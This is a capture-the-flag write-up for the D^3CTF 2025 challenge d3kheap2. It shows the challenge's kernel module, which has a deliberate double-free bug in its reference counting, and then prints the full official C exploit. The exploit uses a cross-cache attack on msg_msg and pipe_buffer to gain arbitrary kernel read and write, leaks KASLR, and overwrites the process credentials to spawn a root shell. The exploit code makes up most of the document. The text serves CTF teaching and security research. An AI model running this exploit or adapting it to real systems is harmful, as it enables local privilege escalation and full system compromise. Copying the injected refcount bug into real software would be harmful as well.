0x00. Before We Start

To be honest, I hadn’t planned to create any challenges for this year’s D^3CTF 2025, as I hadn’t prepared any ideas cool and fancy enough to meet my own expectations. Generally, preparing the main part of the challenges should be the task of my junior schoolmates who haven’t yet graduated from my bachelor’s university. However, due to some real-life issues they hadn’t got the Pwn part done, and I only learned that 10 days before the competition started. Therefore I had to rush in together with my long-time teammate Eqqie (a kind of penguin (aka QI’E in Chinese) living on the Equator, who is powerful at hunting CVEs) to create Pwn challenges from rather plain ideas. Fortunately we made three Pwn challenges in the end, and we still managed to make the Pwn part of D^3CTF 2025 look normal.

Though the ideas we present today might not be cool and fancy enough, I still hope you like them. Here comes the detailed writeup :)

0x01. D3KHEAP2 | 6 Solves

“Once I was seven years old my arttnba3 told me”

“go make yourself some d3kheap or you’ll be lonely”

“Soon I’ll be 60 years old will I think the kernel pwn is cold”

“Or will I have a lot of baby heap who can sign me in”

Copyright(c) 2025 <ディーキューブ・シーティーエフ カーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

You can get the attachment at https://github.com/arttnba3/D3CTF2025_d3kheap2.

Introduction

A very easy kernel pwn challenge that does not require spending too much effort on reverse engineering. The challenge provides us with a kernel module named d3kheap2.ko, whose only functionality is allocating and freeing objects from an isolated kmem_cache called d3kheap2_cache. The vulnerability is that we can free an object twice, due to a misconfigured initialization of the reference count, similar to the original d3kheap.

static long d3kheap2_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    struct d3kheap2_ureq ureq;
    long res = 0;

    spin_lock(&d3kheap2_globl_lock);

    if (copy_from_user(&ureq, (void *) arg, sizeof(ureq))) {
        logger_error("Unable to copy request from userland!\n");
        res = -EFAULT;
        goto out;
    }

    if (ureq.idx >= D3KHEAP2_BUF_NR) {
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        goto out;
    }

    switch (cmd) {
    case D3KHEAP2_OBJ_ALLOC:
        if (d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] has already been occupied!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        d3kheap2_bufs[ureq.idx].buffer = kmem_cache_alloc(
            d3kheap2_cachep,
            GFP_KERNEL | __GFP_ZERO
        );
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error("Failed to alloc new buffer on expected slot!\n");
            res = -ENOMEM;
            break;
        }

        /* vulnerability here */
        atomic_set(&d3kheap2_bufs[ureq.idx].ref_count, 1);
        atomic_inc(&d3kheap2_bufs[ureq.idx].ref_count);

        logger_info(
            "Successfully allocate new buffer for slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_FREE:
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] had not been allocated!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        if (atomic_read(&d3kheap2_bufs[ureq.idx].ref_count) <= 0) {
            logger_error("You're not allowed to free a free slot!");
            res = -EPERM;
            break;
        }

        atomic_dec(&d3kheap2_bufs[ureq.idx].ref_count);
        kmem_cache_free(d3kheap2_cachep, d3kheap2_bufs[ureq.idx].buffer);

        logger_info(
            "Successfully free existed buffer on slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_EDIT:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    case D3KHEAP2_OBJ_SHOW:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    default:
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        break;
    }

out:
    spin_unlock(&d3kheap2_globl_lock);

    return res;
}

Exploitation

As the victim object lives in a dedicated kmem_cache, we have to think outside the box. Hence comes the cross-cache attack:

  • Heap-spray to allocate lots of challenge objects, then free them all so that the SLUB pages are returned to the buddy allocator
  • Heap-spray to get the freed pages reallocated to another kmem_cache; here we choose System V IPC as the first-stage victim
  • Free the dangling pointer to the challenge object to create a UAF on a msg_msgseg, then allocate again to get two references to the same object
  • Free one of the references and reclaim the slot as a pipe_buffer, whose GFP flags match those of msg_msgseg: both are allocated from kmalloc-cg (if CONFIG_SLAB_BUCKETS is DISABLED)
  • Manipulate the msg_msgseg and the pipe_buffer to gain arbitrary read & write in kernel space

Hence we have our final exploit in the file exp.c in this repository. The final success rate is approximately 99.32% (measured over more than 1024 automated local runs), which I think is stable enough :)

Note that you can speed up uploading the exploit to the remote environment by minimizing the binary with musl-gcc (I used x86_64-gentoo-linux-musl-gcc in my tests), or by writing it purely in assembly if you have enough time :)

/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/**
* Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERROR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

void err_exit(char *msg)
{
printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(SUCCESS_MSG("[*] Process bound to core ") "%d\n", core);
}

void get_root_shell(void)
{
if(getuid()) {
log_error("[x] Failed to get the root!");
sleep(5);
exit(EXIT_FAILURE);
}

log_success("[+] Successful to get the root.");
log_info("[*] Execve root shell now...");

system("/bin/sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

/**
* Challenge Interface
**/

#define D3KHEAP2_OBJ_ALLOC 0x3361626e
#define D3KHEAP2_OBJ_FREE 0x74747261
#define D3KHEAP2_OBJ_EDIT 0x54433344
#define D3KHEAP2_OBJ_SHOW 0x4e575046

struct d3kheap2_ureq {
size_t idx;
};

int d3kheap2_alloc(int fd, size_t idx)
{
struct d3kheap2_ureq ureq = {
.idx = idx,
};

return ioctl(fd, D3KHEAP2_OBJ_ALLOC, &ureq);
}

int d3kheap2_free(int fd, size_t idx)
{
struct d3kheap2_ureq ureq = {
.idx = idx,
};

return ioctl(fd, D3KHEAP2_OBJ_FREE, &ureq);
}

int d3kheap2_edit(int fd, size_t idx)
{
struct d3kheap2_ureq ureq = {
.idx = idx,
};

return ioctl(fd, D3KHEAP2_OBJ_EDIT, &ureq);
}

int d3kheap2_show(int fd, size_t idx)
{
struct d3kheap2_ureq ureq = {
.idx = idx,
};

return ioctl(fd, D3KHEAP2_OBJ_SHOW, &ureq);
}

/**
* Exploitation procedure
**/

#define D3KHEAP2_BUF_NR 0x100
#define D3KHEAP2_OBJ_SZ 2048
#define KMALLOC_2K_OBJ_PER_SLUB 16

#define MSG_QUEUE_NR 0x400
/* it cannot be big because the system limits that */
#define MSG_SPRAY_NR 2
#define MSG_SCAVENGER_SZ (D3KHEAP2_OBJ_SZ - 0x30)
#define MSG_SPRAY_SZ (0x1000 - 0x30 + D3KHEAP2_OBJ_SZ - 8)
/* prepare_copy() will do allocation, so we use bigger size for msg_msgseg */
#define MSG_PEEK_SZ (0x1000 - 0x30 + 0x1000 - 8)
#define MSG_TAG_BASE 0x3361626e74747261

#define PIPE_FCNTL_SZ (0x1000 * 32)
#define PIPE_SPRAY_NR 0x180

struct pipe_buffer *fake_pipe_buf;
struct pipe_buf_operations *pipe_ops;
unsigned int pipe_flags;
unsigned long pipe_private;
int pipe_fd[PIPE_SPRAY_NR][2], atk_pipe[2];
int victim_pipe, ovlp_pipe;

void arbitrary_read_by_pipe(
size_t page_addr,
void *buf,
size_t len,
int atk_msgq,
size_t *msg_buf,
size_t msgsz,
long msgtyp
)
{
if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
err_exit("FAILED to read msg_msg and msg_msgseg!");
}

fake_pipe_buf = (struct pipe_buffer*) &msg_buf[511];
fake_pipe_buf->page = (struct page*) page_addr;
fake_pipe_buf->len = 0xff8;
fake_pipe_buf->offset = 0;
fake_pipe_buf->flags = pipe_flags;
fake_pipe_buf->ops = pipe_ops;
fake_pipe_buf->private = pipe_private;

/*
for (int i = 0; i < 0x80; i++) {
char ch[8];
for (int j = 0; j < 8; j++) {
ch[j] = 'A' + i;
}

msg_buf[500 + i] = *(size_t*) ch;
}
*/

if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
}

if (read(atk_pipe[0], buf, 0xff0) < 0) {
perror("[x] Unable to read from pipe");
err_exit("FAILED to read from evil pipe!");
}
}

void arbitrary_write_by_pipe(
size_t page_addr,
void *buf,
size_t len,
int atk_msgq,
size_t *msg_buf,
size_t msgsz,
long msgtyp
)
{
fake_pipe_buf = (struct pipe_buffer*) &msg_buf[516];

if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
err_exit("FAILED to read msg_msg and msg_msgseg!");
}

fake_pipe_buf->page = (struct page*) page_addr;
fake_pipe_buf->len = 0;
fake_pipe_buf->offset = 0;
fake_pipe_buf->ops = pipe_ops;

if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
}

len = len > 0xffe ? 0xffe : len;

if(write(atk_pipe[1], buf, len) < 0) {
perror("[x] Unable to write into pipe");
err_exit("FAILED to write into evil pipe!");
}
}

#define D3KHEAP2_BUF_SPRAY_NR D3KHEAP2_BUF_NR

void exploit(void)
{
struct pipe_buffer *leak_pipe_buf;
int reclaim_msgq[MSG_QUEUE_NR], atk_msgq;
int vuln_msgq[MSG_QUEUE_NR], evil_msgq[MSG_QUEUE_NR];
int vulq_idx, vulm_idx, evilq_idx, evilm_idx, found;
size_t pipe_spray_nr, msg_spray_nr;
int d3kheap2_fd;
char err_msg[0x1000];
size_t buf[0x1000], msg_buf[0x1000];
size_t kernel_leak, current_pcb_page, *comm_addr;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char cred_data_buf[0x1000];
int errno;
struct rlimit rl;

log_info("[*] Preparing env...");

rl.rlim_cur = 4096;
rl.rlim_max = 4096;
if (setrlimit(RLIMIT_NOFILE, &rl) == -1) {
perror("[x] setrlimit");
err_exit("FAILED to expand file descriptor's limit!");
}

bind_core(0);

memset(buf, 0, sizeof(buf));

d3kheap2_fd = open("/proc/d3kheap2", O_RDWR);
if (d3kheap2_fd < 0) {
perror(ERROR_MSG("[x] Unable to open chal fd"));
err_exit("FAILED to open /proc/d3kheap2!");
}

log_info("[*] Preparing msg_queue...");

for (int i = 0; i < MSG_QUEUE_NR; i++) {
if ((reclaim_msgq[i] = get_msg_queue()) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to allocate no.%d reclaim msg_queue",
i
);
perror(err_msg);
err_exit("FAILED to allocate msg_queue for clearing partial SLUB!");
}
}

for (int i = 0; i < MSG_QUEUE_NR; i++) {
if ((vuln_msgq[i] = get_msg_queue()) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to allocate no.%d vuln msg_queue",
i
);
perror(err_msg);
err_exit("FAILED to allocate msg_queue to be UAF!");
}
}

for (int i = 0; i < MSG_QUEUE_NR; i++) {
if ((evil_msgq[i] = get_msg_queue()) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to allocate no.%d evil msg_queue",
i
);
perror(err_msg);
err_exit("FAILED to allocate msg_queue to be evil!");
}
}

if ((atk_msgq = get_msg_queue()) < 0) { /* parentheses needed: `<` binds tighter than `=` */
perror("[x] Unable to allocate attacker msg_queue");
err_exit("FAILED to allocate msg_queue for attacking!");
}

log_info("[*] Preparing msg_msg...");

for (int i = 0; i < MSG_QUEUE_NR; i++) {
for (int j = 0; j < MSG_SPRAY_NR; j++) {
if (write_msg(
reclaim_msgq[i],
buf,
0x1000 - 0x30,
MSG_TAG_BASE + j
) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to prealloc %d-%d 4k msg_msg\n",
i,
j
);
perror(err_msg);
err_exit("FAILED to spray msg_msg!");
}
}
}

log_info("[*] Preparing pipe_buffer...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if (pipe(pipe_fd[i]) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to create %d pipe\n",
i
);
perror(err_msg);
err_exit("FAILED to prepare pipe_buffer!");
}
}

log_info("[*] Spraying d3kheap2 buffer...");

for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
if ((errno = d3kheap2_alloc(d3kheap2_fd, i)) < 0) {
printf(
ERROR_MSG("FAILED to allocate no.")"%d"
ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
i,
errno
);
err_exit("FAILED to allocate d3kheap2 buffer!");
}
}

log_info(
"[*] Freeing d3kheap2 buffer into buddy "
"and reclaiming as kmalloc-cg-2k SLUB page..."
);

pipe_spray_nr = msg_spray_nr = 0;

for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 == 0) {
continue;
}

if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
printf(
ERROR_MSG("FAILED to free no.")"%d"
ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
i,
errno
);
err_exit("FAILED to free d3kheap2 buffer!");
}
}

log_info("[*] Spraying msg_msg to reclaim...");

for (int i = 0; i < MSG_QUEUE_NR; i++) {
for (int j = 0; j < (MSG_SPRAY_NR / 2); j++) {
if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to reclaim %d-%d 4k msg_msg\n",
i,
j
);
perror(err_msg);
err_exit("FAILED to reclaim msg_msg!");
}

buf[520] = i;
buf[521] = j;

if (write_msg(vuln_msgq[i],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+j) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
i,
j
);
perror(err_msg);
err_exit("FAILED to spray msg_msg!");
}
}
}

for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 != 0) {
continue;
}

if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
printf(
ERROR_MSG("FAILED to free no.")"%d"
ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
i,
errno
);
err_exit("FAILED to free d3kheap2 buffer!");
}
}

log_info("[*] Spraying msg_msg to reclaim...");

for (int i = 0; i < MSG_QUEUE_NR; i++) {
for (int j = MSG_SPRAY_NR / 2; j < MSG_SPRAY_NR; j++) {
if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to reclaim %d-%d 4k msg_msg\n",
i,
j
);
perror(err_msg);
err_exit("FAILED to reclaim msg_msg!");
}

buf[520] = i;
buf[521] = j;

if (write_msg(vuln_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE+j) < 0){
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
i,
j
);
perror(err_msg);
err_exit("FAILED to spray msg_msg!");
}
}
}

/* To be honest, we only need to free ONE obj here, just think :) */
log_info("[*] Creating UAF on msg_msg...");

for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
printf(
ERROR_MSG("FAILED to free no.")"%d"
ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
i,
errno
);
err_exit("FAILED to free d3kheap2 buffer!");
}
}

found = 0;
for (int i = 0; i < MSG_QUEUE_NR; i++) {
for (int j = 0; j < MSG_SPRAY_NR; j++) {
buf[520] = *(size_t*) "arttnba3";
buf[520] += i;
buf[521] = *(size_t*) "D3CTFPWN";
buf[521] += j;

if (write_msg(evil_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE + j)<0){
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
i,
j);
perror(err_msg);
err_exit("FAILED to spray msg_msg!");
}
}
}

/* make sure the UAF object is on CPU SLAB, so no more spray then */
for (int k = 0; k < MSG_QUEUE_NR; k++) {
for (int l = 0; l < MSG_SPRAY_NR; l++) {
if (peek_msg(vuln_msgq[k], buf, MSG_PEEK_SZ, l) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to peek %d-%d msg_msg\n",
k,
l
);
perror(err_msg);
err_exit("FAILED to peek msg_msg!");
}

if (buf[520] == *(size_t*) "arttnba3"
|| buf[521] == *(size_t*) "D3CTFPWN") {
evilq_idx = buf[520] - *(size_t*) "arttnba3";
evilm_idx = buf[521] - *(size_t*) "D3CTFPWN";
vulq_idx = k;
vulm_idx = l;
printf(
SUCCESS_MSG("[+] Found victim on no.")"%d "
SUCCESS_MSG("msg in no.")"%d"SUCCESS_MSG("vulqueue")
SUCCESS_MSG(".Same msg is on no.")"%d "
SUCCESS_MSG("msg in no.")"%d \n",
vulm_idx,
vulq_idx,
evilm_idx,
evilq_idx
);
found = 1;
goto out_uaf_msg;
}
}
}

if (!found) {
err_exit("FAILED to create cross-cache UAF by spraying msg_msg!");
}

out_uaf_msg:
log_info("[*] Shifting obj-overlapping from msg_msg to pipe_buffer...");

if (read_msg(vuln_msgq[vulq_idx],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+vulm_idx)<0){
perror("[x] Unable to free the victim msg_msg");
err_exit("FAILED to free victim msg_msg!");
}

for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
i
);
perror(err_msg);
err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
}
}

if (read_msg(
evil_msgq[evilq_idx],
buf,
MSG_SPRAY_SZ,
MSG_TAG_BASE + evilm_idx
) < 0) {
perror("[x] Unable to free the victim msg_msg");
err_exit("FAILED to free victim msg_msg!");
}

/* identification */
for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
/* The great j8 helps us a lot :) */
for (int j = 0; j < 8; j++) {
write(pipe_fd[i][1], &i, sizeof(i));
}
}

found = 0;
for (int i = (PIPE_SPRAY_NR / 2); i < PIPE_SPRAY_NR; i++) {
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
snprintf(
err_msg,
sizeof(err_msg) - 1,
"[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
i
);
perror(err_msg);
err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
}

for (int j = 0; j < 114; j++) {
write(pipe_fd[i][1], &i, sizeof(i));
}

/**
* we keep checking to make sure that the object is allocated
* from the first object of CPU SLUB, hence no spray later
*/
for (int j = 0; j < (PIPE_SPRAY_NR / 2); j++) {
int ident;
read(pipe_fd[j][0], &ident, sizeof(ident));
if (ident != j) {
printf(
SUCCESS_MSG("[+] Found victim pipe: ")"%d"
SUCCESS_MSG(" , overlapped with ")"%d\n",
j,
ident
);
victim_pipe = j;
ovlp_pipe = ident;
goto out_overlap_pipe;
}
write(pipe_fd[j][1], &ident, sizeof(ident));
}
}

if (!found) {
err_exit("FAILED to shift OVERLAP from msg_msg to pipe_buffer!");
}

out_overlap_pipe:
close(pipe_fd[victim_pipe][1]);
close(pipe_fd[victim_pipe][0]);

if (pipe(atk_pipe) < 0 || fcntl(atk_pipe[1], F_SETPIPE_SZ, 0x1000*32) < 0) {
err_exit("FAILED to allocate new pipe for attacking!");
}

/* move to pipe_buffer[1] */
write(atk_pipe[1], "arttnba3", 8);
read(atk_pipe[0], buf, 8);
write(atk_pipe[1], "arttnba3", 8);

close(pipe_fd[ovlp_pipe][1]);
close(pipe_fd[ovlp_pipe][0]);

memset(buf, 0, sizeof(buf));
if (write_msg(atk_msgq, buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
perror("[x] Unable to allocate new msg_msg");
err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
}

write(atk_pipe[1], "arttnba3", 8);

if (read_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
perror("[x] Unable to peek the victim object");
err_exit("FAILED to peek the victim object!");
}

leak_pipe_buf = (void*) &msg_buf[516];

printf(
SUCCESS_MSG("[+] Leak pipe_buffer::page ") "%p"
SUCCESS_MSG(", pipe_buffer::ops ") "%p\n",
leak_pipe_buf->page,
leak_pipe_buf->ops
);

pipe_flags = leak_pipe_buf->flags;
pipe_ops = (void*) leak_pipe_buf->ops;
pipe_private = leak_pipe_buf->private;

vmemmap_base = (size_t) leak_pipe_buf->page & KASLR_MASK;
log_info("[*] Try to guess vmemmap_base...");
printf("[*] Starts from %lx...\n", vmemmap_base);

if (write_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
perror("[x] Unable to allocate new msg_msg");
err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
}

arbitrary_read_by_pipe(
vmemmap_base + 0x9d000 / 0x1000 * 0x40,
buf,
0xff0,
atk_msgq,
msg_buf,
MSG_SPRAY_SZ,
MSG_TAG_BASE
);

kernel_leak = buf[0];
for (int loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
} else {
printf("[?] Got leak: %lx\n", kernel_leak);
sleep(2);
}

for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%d loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);

vmemmap_base -= KASLR_GRANULARITY;
arbitrary_read_by_pipe(
vmemmap_base + 0x9d000 / 0x1000 * 0x40,
buf,
0xff0,
atk_msgq,
msg_buf,
MSG_SPRAY_SZ,
MSG_TAG_BASE
);
}

log_info("[*] Seeking task_struct in kernel space...");

prctl(PR_SET_NAME, "arttnba3pwnn");
uid = getuid();
gid = getgid();

for (int i = 0; 1; i++) {
arbitrary_read_by_pipe(
vmemmap_base + i * 0x40,
buf,
0xff0,
atk_msgq,
msg_buf,
MSG_SPRAY_SZ,
MSG_TAG_BASE
);

comm_addr = memmem(buf, 0xff0, "arttnba3pwnn", 12);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

cred_kaddr = comm_addr[-2];
cred_data = (void*) (cred_data_buf + (cred_kaddr & (0x1000 - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;

while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;

arbitrary_read_by_pipe(
cred_kpage_addr,
cred_data_buf,
0xff0,
atk_msgq,
msg_buf,
MSG_SPRAY_SZ,
MSG_TAG_BASE
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n",
page_offset_base
);
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}

page_offset_base -= KASLR_GRANULARITY;
puts("[?] Looping!?");
}

break;
}
}

puts("[*] Overwriting cred and granting root privilege...");

cred_data->uid = 0;
cred_data->gid = 0;

arbitrary_write_by_pipe(
cred_kpage_addr,
cred_data_buf,
0xff0,
atk_msgq,
msg_buf,
MSG_SPRAY_SZ,
MSG_TAG_BASE
);

setresuid(0, 0, 0);
setresgid(0, 0, 0);

get_root_shell();

system("/bin/sh");
}

void banner(void)
{
puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kheap2 --------") "\n"
INFO_MSG("-------- Official Exploitation --------\n")
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
banner();
exploit();
return 0;
}

What’s more…

The introduction is adapted from one of my favourite songs, from when I was not 7 but 15 years old, which will always remind me of my teenage years. I hope it can also remind you of how far Linux kernel exploitation has come compared to the old d3kheap in D^3CTF 2022. With the amazing cross-cache attack we can exploit almost every UAF and double-free vulnerability by transferring SLUB pages from one kmem_cache to another. That’s why I named it d3kheap2: a solution upgrade, from the limited one for d3kheap’s easy double free to a general one for d3kheap2’s lunatic double free.

Although the core technique of this challenge is not new in 2025 (it can be traced back to at least 2022, though I don’t know whether that is the oldest public instance), the cross-cache attack has not been common in CTFs over the past few years. Therefore I chose to present this technique in this year’s D^3CTF, as I was busy in 2024 and presented nothing that year, and in 2023 I had presented something else (which was plagiarized one year later at Black Hat USA 2024 by a student called Jiayi Hu who had participated in that competition).

Another reason I finally chose the cross-cache attack is that I did not have much time to complete these challenges. Since graduating from my undergraduate program, I haven’t paid much attention to how my junior schoolmates were preparing for this year’s D^3CTF, and I only learned that almost no pwn challenges had been created about 10 days before the competition started. Therefore I had to step up and rush to create the pwn challenges with almost nothing new from my own research in mind, to make sure the competition could be held normally as in past years. I’m sorry, and I apologize, that I didn’t bring something as cool as d3kcache in 2023. But luckily I still have something special for you: how I manipulate msg_msg and pipe_buffer, tricky but useful gadgets you may fall in love with.

And if you pay enough attention to the kernel itself, you may notice that I did not enable the CONFIG_SLAB_BUCKETS option as d3kshrm’s kernel does, which is a mitigation against heap spraying. Although it is not difficult to bypass this mitigation by doing full heap spraying instead of precise object allocation, since this year’s D^3CTF was planned to run for only 24 hours, I hoped this challenge could be the easy “sign in” for pwn, just like the old introduction of d3kheap back in D^3CTF 2022. Therefore this challenge was deliberately designed not to be extremely difficult.

As for the final result of this challenge, most players adopted the expected solution, the cross-cache attack. I’m happy to see that many participating CTFers know how to take advantage of such advanced techniques, which can be regarded as a general approach to almost arbitrary heap vulnerabilities. As the cross-cache attack has been widely used in recent years, I’m convinced it already is (or soon will be) the baseline strategy and standard starting point for Linux kernel exploitation of heap vulnerabilities. One pity is that I FORGOT to turn on CONFIG_MEMCG to separate GFP_KERNEL and GFP_KERNEL_ACCOUNT into different kmem_caches: as you can see, I adopted a multi-stage exploitation that heavily manipulates msg_msg and pipe_buffer, while some players simply used sk_buff to read and write the UAF’d pipe_buffer directly. Another pity is that the team We_0wn_y0u, who got first blood on d3kheap2, solved ONLY d3kheap2 in D^3CTF 2025 and seems to have disappeared afterwards, so for now I don’t know their detailed solution.

